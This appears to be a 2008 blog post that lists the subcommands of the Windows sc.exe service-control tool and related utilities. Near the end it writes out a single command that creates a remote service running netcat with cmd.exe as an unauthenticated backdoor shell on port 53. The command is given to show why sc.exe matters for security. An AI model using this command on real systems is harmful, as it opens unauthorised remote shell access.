Thursday, 27 March 2008

sc on windows SERVICE

"sc.exe" or Service Control allows the Creation, Starting, Stopping, Querying or Deletion of any Windows Service. The command options for SC are case sensitive.

For details on How to create services using sc, see: http://support.microsoft.com/default.aspx/kb/251192

The "sc" commands are:

  • query [qryOpt] Show status
  • queryEx [qryOpt] Show extended info - pid, flags
  • GetDisplayName Show the DisplayName
  • GetKeyName Show the ServiceKeyName
  • EnumDepend Show Dependencies
  • qc Show config - dependencies, full path etc
  • start START a service.
  • stop STOP a service
  • pause PAUSE a service.
  • continue CONTINUE a service.
  • create Create a service. (add thie service to the registry)
  • config permanently change the service configuration
  • delete Delete a service (from the registry)
  • control Send a control to a service
  • interrogate Send an INTERROGATE control request to a service
  • Qdescription Query the description of a service
  • description Change the description of a service
  • Qfailure Query the actions taken by a service upon failure
  • failure Change the actions taken by a service upon failure
  • sdShow Display a service's security descriptor using SDDL
  • SdSet Sets a service's security descriptor using SDDL
Now the question is how does this relate to security? For an answer, think of the command:

C:\> sc.exe \\[Hostname] create nc_service binpath="c:\temp\nc.exe –l –p 53 –e cmd.exe"

A simple backdoor listening on an unsued port without authentication may be created with just a simple command. So hence the link to security.

Some related Windows commands are:
DELSRV - Delete NT service
INSTSRV - Install an NT service (run under a specific account)
NET - manage network resources
NETSVC - Command-line Service Controller (Win 2K ResKit)
PsService - View and control services
CLIST - Display NT Services
START/HIGH - Start a specified program or command.
Svcmon - Monitor services and raise an alert if they stop. (Win 2K ResKit)
Svcacls - Service ACL Editor (Win 2K ResKit)
SUBINACL - Set service permissions
WMIC SERVICE - WMI access to services

No comments: